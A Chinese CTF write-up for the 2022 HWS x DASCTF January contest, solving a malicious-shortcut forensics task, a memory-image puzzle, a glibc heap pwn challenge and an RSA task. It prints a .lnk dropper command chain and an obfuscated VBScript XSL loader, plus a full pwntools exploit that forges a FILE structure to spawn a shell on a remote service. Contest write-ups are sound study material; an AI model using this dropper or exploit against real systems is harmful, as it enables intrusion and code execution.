2022HWS硬件安全冬令营 X DASCTF Jan部分Writeup

文章目录

MISC

badPDF

gogogo

PWN

送分题

CRYPTO

babyrsa


MISC

badPDF

首先是一个lnk的windows快捷方式,使用windows打开,会看到一个一闪而过的cmd,然后打开了一个pdf。运行之后文件的结构似乎会发生改变,看了下快捷方式的指向内容发现了东西。

%SystemRoot%\system32\cmd.exe /c copy "20200308-sitrep-48-covid-19.pdf.lnk" %tmp%\\g4ZokyumBB2gDn.tmp /y
&for /r C:\\Windows\\System32\\ %i in (*ertu*.exe) do copy %i %tmp%\\msoia.exe /y
&findstr.exe "TVNDRgAAAA" %tmp%\\g4ZokyumBB2gDn.tmp > %tmp%\\cSi1r0uywDNvDu.

去%tmp%目录中模拟工作过程

findstr.exe "TVNDRgAAAA" g4ZokyumBB2gDn.tmp >00hululu
.\msoia.exe -decode .\00hululu 11hahaha
expand .\11hahaha -F:* ./

得到文件cSi1r0uywDNvDu.tmp

<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
 <ms:script implements-prefix="user" language="VBScript">
 <![CDATA[
 rBOH7OLTCVxzkH = HrtvBsRh3gNUbe("676d60667a64333665326564333665326564333665326536653265643336656564333665327c"):
 execute(rBOH7OLTCVxzkH):
	function HrtvBsRh3gNUbe(bhhz6HalbOkrki):
		for rBOH7OLTCVxzkH= 1 to len(bhhz6HalbOkrki) step 2:
			HrtvBsRh3gNUbe = HrtvBsRh3gNUbe & chr(asc(chr("&h" & mid(bhhz6HalbOkrki,rBOH7OLTCVxzkH,2)))xor 1):
			next:
	end function:
 ]]> </ms:script>
</stylesheet>

去混淆后

for i= 1 to to len(676d60667a64333665326564333665326564333665326536653265643336656564333665327c) step 2:
	flag = flag & chr(asc(chr("&h" & mid(676d60667a64333665326564333665326564333665326536653265643336656564333665327c,i,2)))xor 1):
	next:

 直接解密拿到flag

gogogo

题目给了一个raw一组拼图,直接拼手撸轻轻松松(完整图片其实是后期脚本跑出来的

获得密码,smd5查了一下发现是123456easyx的md5,不过没什么用

3e8f092d4d7b80ce338d6e238efb01

随后镜像取证

Python vol.py -f 2.raw filescan | grep -E ".zip|.rar|.jpg|.png|.txt|.bmp|.7z"

发现csgo.zip,直接dump出来。是个加密压缩包,用上面的密码进行解压。binwalk文件后拿到一张jpg

Aztec码,ps加上中间缺少的部分

 用中国编码直接扫出flag:flag{fbab8380-a642-48aa-89b1-8e251f826b12}

 

PWN

送分题

真·送分原题,http://www.suphp.cn/anquanke/12/258512.html#

利用UAF来进行Unsortbin Attack,修改Global_max_fast的值为main_arena+96,那么程序最后会释放掉堆块,此时很大的堆块都被放到fastbin链表中,每个fastbin链表的头结点会在libc空间存有一个指针.

利用步骤一来劫持_IO_list_all指针,伪造一个File的结构体,利用 _IO_str_finish来Getshell.

旧exp直接打

from pwn import *

# from LibcSearcher import *
context.log_level = 'debug'
debug = 0
file_name = './pwn'
libc_name = './libc-2.27.so'
ip = '1.13.162.249'
prot = '10001'
if debug:
    r = process(file_name)
    libc = ELF(libc_name)
else:
    r = remote(ip, int(prot))
    libc = ELF(libc_name)


def debug():
    gdb.attach(r)
    raw_input()


def pack_file(_flags=0,
              _IO_read_ptr=0,
              _IO_read_end=0,
              _IO_read_base=0,
              _IO_write_base=0,
              _IO_write_ptr=0,
              _IO_write_end=0,
              _IO_buf_base=0,
              _IO_buf_end=0,
              _IO_save_base=0,
              _IO_backup_base=0,
              _IO_save_end=0,
              _IO_marker=0,
              _IO_chain=0,
              _fileno=0,
              _lock=0,
              _wide_data=0,
              _mode=0):
    file_struct = p32(_flags) + \
                  p32(0) + \
                  p64(_IO_read_ptr) + \
                  p64(_IO_read_end) + \
                  p64(_IO_read_base) + \
                  p64(_IO_write_base) + \
                  p64(_IO_write_ptr) + \
                  p64(_IO_write_end) + \
                  p64(_IO_buf_base) + \
                  p64(_IO_buf_end) + \
                  p64(_IO_save_base) + \
                  p64(_IO_backup_base) + \
                  p64(_IO_save_end) + \
                  p64(_IO_marker) + \
                  p64(_IO_chain) + \
                  p32(_fileno)
    file_struct = file_struct.ljust(0x88, b"\x00")
    file_struct += p64(_lock)
    file_struct = file_struct.ljust(0xa0, b"\x00")
    file_struct += p64(_wide_data)
    file_struct = file_struct.ljust(0xc0, b'\x00')
    file_struct += p64(_mode)
    file_struct = file_struct.ljust(0xd8, b"\x00")
    return file_struct


file = ELF(file_name)
sl = lambda x: r.sendline(x)
sd = lambda x: r.send(x)
sla = lambda x, y: r.sendlineafter(x, y)
rud = lambda x: r.recvuntil(x, drop=True)
ru = lambda x: r.recvuntil(x)
li = lambda name, x: log.info(name + ':' + hex(x))
ri = lambda: r.interactive()
ru('Now you can get a big box, what size?')
sl(str(0x1430))
ru('Now you can get a bigger box, what size?')
sl(str(0x5000))
ru('Do you want to rename?(y/n)')
sl('y')
ru('Now your name is:')
main_arena = u64(r.recv(6) + b'\x00\x00')
li("main_arena", main_arena)
libc_base = main_arena - 0x3ebca0
system = libc_base + libc.symbols['system']
global_max_fast = libc_base + 0x3ed940
IO_list_all = libc_base + libc.symbols['_IO_list_all']
IO_str_jumps = 0x3e8360 + libc_base
payload = p64(main_arena) + p64(global_max_fast - 0x10)
binsh = 0x00000000001b40fa + libc_base
sl(payload)
# debug()
ru("Do you want to edit big box or bigger box?(1:big/2:bigger)\n")
sl("1")
ru(':\n')
fake_file = pack_file(_IO_read_base=IO_list_all - 0x10,
                      _IO_write_base=0,
                      _IO_write_ptr=1,
                      _IO_buf_base=binsh,
                      _mode=0, )
fake_file += p64(IO_str_jumps - 8) + p64(0) + p64(system)
sl(fake_file[0x10:])
ri()
flag{5hen_m3_5hi_kuai_1e_xin9_Qiu}

CRYPTO

babyrsa

import os
from secret import FLAG,p,q,e
from Crypto.Util.number import bytes_to_long,long_to_bytes


N = p*q

def encrypt(m,N,e):
	return pow(m,e,N)

def decrypt(c,N,d):
	return pow(c,d,N)

def padding(msg):
    res = msg
    if len(res) < 128:
        res = res + os.urandom(128-len(res))
    return res

def transfer(msg):
    assert len(msg) < 128
    m = padding(msg)
    return bytes_to_long(m)

if __name__ == "__main__":
    m = transfer(FLAG)
    print(N,e)
    print(encrypt(m,N,e))


#13123058934861171416713230498081453101147538789122070079961388806126697916963123413431108069961369055630747412550900239402710827847917960870358653962948282381351741121884528399369764530446509936240262290248305226552117100584726616255292963971141510518678552679033220315246377746270515853987903184512948801397452104554589803725619076066339968999308910127885089547678968793196148780382182445270838659078189316664538631875879022325427220682805580410213245364855569367702919157881367085677283124732874621569379901272662162025780608669577546548333274766058755786449491277002349918598971841605936268030140638579388226573929 2199344405076718723439776106818391416986774637417452818162477025957976213477191723664184407417234793814926418366905751689789699138123658292718951547073938244835923378103264574262319868072792187129755570696127796856136279813658923777933069924139862221947627969330450735758091555899551587605175567882253565613163972396640663959048311077691045791516671857020379334217141651855658795614761069687029140601439597978203375244243343052687488606544856116827681065414187957956049947143017305483200122033343857370223678236469887421261592930549136708160041001438350227594265714800753072939126464647703962260358930477570798420877
#1492164290534197296766878830710549288168716657792979479408332026408553210558539364503279432780006256047888761718878241924947937039103166564146378209168719163067531460700424309878383312837345239570897122826051628153030129647363574035072755426112229160684859510640271933580581310029921376842631120847546030843821787623965614564745724229763999106839802052036834811357341644073138100679508864747009014415530176077648226083725813290110828240582884113726976794751006967153951269748482024859714451264220728184903144004573228365893961477199925864862018084224563883101101842275596219857205470076943493098825250412323522013524

不用想多,N能直接分解,factordb.com

n = 13123058934861171416713230498081453101147538789122070079961388806126697916963123413431108069961369055630747412550900239402710827847917960870358653962948282381351741121884528399369764530446509936240262290248305226552117100584726616255292963971141510518678552679033220315246377746270515853987903184512948801397452104554589803725619076066339968999308910127885089547678968793196148780382182445270838659078189316664538631875879022325427220682805580410213245364855569367702919157881367085677283124732874621569379901272662162025780608669577546548333274766058755786449491277002349918598971841605936268030140638579388226573929
p = 98197216341757567488149177586991336976901080454854408243068885480633972200382596026756300968618883148721598031574296054706280190113587145906781375704611841087782526897314537785060868780928063942914187241017272444601926795083433477673935377466676026146695321415853502288291409333200661670651818749836420808033
q = 133639826298015917901017908376475546339925646165363264658181838203059432536492968144231040597990919971381628901127402671873954769629458944972912180415794436700950304720548263026421362847590283353425105178540468631051824814390421486132775876582962969734956410033443729557703719598998956317920674659744121941513
e = 2199344405076718723439776106818391416986774637417452818162477025957976213477191723664184407417234793814926418366905751689789699138123658292718951547073938244835923378103264574262319868072792187129755570696127796856136279813658923777933069924139862221947627969330450735758091555899551587605175567882253565613163972396640663959048311077691045791516671857020379334217141651855658795614761069687029140601439597978203375244243343052687488606544856116827681065414187957956049947143017305483200122033343857370223678236469887421261592930549136708160041001438350227594265714800753072939126464647703962260358930477570798420877
c = 1492164290534197296766878830710549288168716657792979479408332026408553210558539364503279432780006256047888761718878241924947937039103166564146378209168719163067531460700424309878383312837345239570897122826051628153030129647363574035072755426112229160684859510640271933580581310029921376842631120847546030843821787623965614564745724229763999106839802052036834811357341644073138100679508864747009014415530176077648226083725813290110828240582884113726976794751006967153951269748482024859714451264220728184903144004573228365893961477199925864862018084224563883101101842275596219857205470076943493098825250412323522013524

import binascii
import gmpy2

phi = (p - 1) * (q - 1)
d = gmpy2.invert(e, phi)
m = pow(c, d, n)
print(binascii.unhexlify(hex(m)[2:].strip("L")))
# b'hwctf{01d_Curs3_c4Me_Again}vG\x03MC\xcd\xfd\x1d\x0bO\xcaV\x9b\x87vk\xd6\xb3\xbb\x8f\xc5\xd61\xdf7\x0f\x90\xc6\x17oj]\xf5J\xd4\xa9\xcc\xdb\xbe?\xb2(\xf0\xb2\xb6\x99b\xa7e\xa8\x82\xf7SY\xc7\xd9\xde\xc4\xb5\xe3q\xc1\xe8\xfeM\xbd\xbe\xfdD\xed\xb3\x12~\x9d\xba\xa4\xb0\xfek\x81\xc4-\x82\xb3%\xae4\x7fGl\x9a\xac\xc3\x91\xc1\xbc\x04\x03o\xa4\x8d'
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

塞纳河畔的春水

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值